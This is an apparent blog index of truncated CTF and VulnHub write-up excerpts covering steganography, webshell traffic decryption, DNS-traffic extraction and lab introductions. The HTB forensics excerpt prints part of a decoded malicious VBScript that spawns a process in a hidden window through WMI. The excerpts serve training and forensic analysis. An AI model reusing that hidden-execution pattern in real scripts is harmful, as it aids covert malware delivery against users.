VulnHub lab notes: DC-9
VulnHub lab DC-9. Lab description: DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I ...
2023FIC (except the two program-analysis challenges)
2023 Zhejiang Police Joint Competition (浙警联合赛)
VulnHub lab notes: DC-8
VulnHub lab DC-8. Lab description: DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
This challenge is a bit of a hybrid between being an actual challenge, and being a "proof of concept" as to whether two-factor authentication installed and configured on Linux can prevent the Linux server from being exploited.
The "proof of concept" portion of this challenge eventuated as a result of a question being asked about two-fact ...
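2023 Geek Challenge (极客大挑战)
2023 Geek Challenge, misc: DEATH_N0TE (image scaling). The challenge says the flag has two parts and that there is a great deal of steganographic information, which makes things easier: go straight to image steganography.
Using 010 Editor, a string is found at the end of the image; base-decode it.
"You have found a copy of 'DEATH NOTE'. Driven by curiosity, you open the notebook and read the rules of use, but you are surprised to find that rule 10 alone is missing from the rules you just read..."
"You go to check again whether that is so, but the writing in the notebook seems to come alive, growing and shrinking before your eyes; you close your eyes..."
"The originally black writing suddenly turns blood red, and the eerie image still appears before your retinas; you decide to stop dwelling on the lost rule, and the hallucination disappears..."
Since it is a PNG file, consider LSB steganography next.
One look at how it appears and, sure enough, something is off.
Extract the data: in bit 0 of the R, G and B channels there is yet another base-encoded string.
Decode it to get the first part of the flag.
"You continue to examine the pitch-black notebook in your hands; having calmed down, you notice a line of small print hidden at the very bottom of the cover: SYC{D4@Th_N0t4_"
"You browse through the whole notebook, but unfortunately it is all blank pages; one of the pages has been torn out by someone unknown, and in the end you still ...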
VulnHub lab notes: DC-7
VulnHub lab DC-7. Lab description: DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
While this isn't an overly technical challenge, it isn't exactly easy.
While it's kind of a logical progression from an earlier DC release (I won't tell you which one), there are some new concepts involved, but you will need to figure those out for yourself. :-) If you need to resort to brute forcing or dictionary attacks, you probably won ...
2024NKCTF
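NKCTF2024, Misc: webshell_pro (AES decryption, webshell). Follow the TCP streams; stream 9 contains a long string. Base64-decoding it twice yields an RSA encryption script.
Run it through chat directly and adapt it into a decryption script.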
import base64
import libnum
from Crypto.PublicKey import RSA
pubkey = """-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCK/qv5P8ixWjoFI2rzF62tm6sDFnRsKsGhVSCuxQIxuehMWQLmv6TPxyTQPefIKufzfUFaca/YHkIVIC19ohmE5X738TtxGbOgiGef4bvd9sU6M42k8vMlCPJp1woDFDOFoBQpr4YzH4ZTR6Ps+HP8VEIJMG5uiLQOLxdKdxi41QIDAQAB
-----END PUBLIC KEY-----
"""
prikey = "" ...
HTBCyberCTF2024
HTBCyberCTF2024, Forensics (partial): Urgent. The provided attachment is an XML file; open it directly in Notepad.
Decode the base64.
document.write(unescape('
>_
404 Not Found
Sub window_onload
const impersonation = 3
Const HIDDEN_WINDOW = 12
Set Locator = CreateObject("WbemScripting.SWbemLocator")
Set Service = Locator.ConnectServer()
Service.Security_.ImpersonationLevel=impersonation
Set objStartup = Service.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
Set Process = Service.Get("Win32_Process") ...
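2023 China Industrial Internet Security Competition Finals - misc
2023 China Industrial Internet Security Competition Finals - misc. I came across this competition while browsing CSDN, so I downloaded the attachments and gave them a try.
DNS_Query (extracting data from DNS traffic, QR code). We are given a DNS traffic capture, and the Info column contains something.
However, every two packets have the same Info, so filter first.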
frame.len == 142
Write a tshark command to extract the information:
tshark -r DNS_Query.pcapng -T fields -Y "frame.len == 142" -e "dns.qry.name" | awk '{print substr($0,0,29)}' | tr -d '\n' >data.txt
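-Y filters the packets.
-e: as the screenshot above shows, the data we want to extract is in the name field of the queries.
awk processes the extracted text, taking 29 consecutive characters starting from the first character; here we only need the numeric part.
tr further processes the text by removing the newline at the end of each line.
Guessing that this string is a QR code, write a script to convert it: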
from PIL import Imag ...
VulnHub lab notes: DC-6
VulnHub lab DC-6. Lab description: DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
This isn't an overly difficult challenge so should be great for beginners.
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can a ...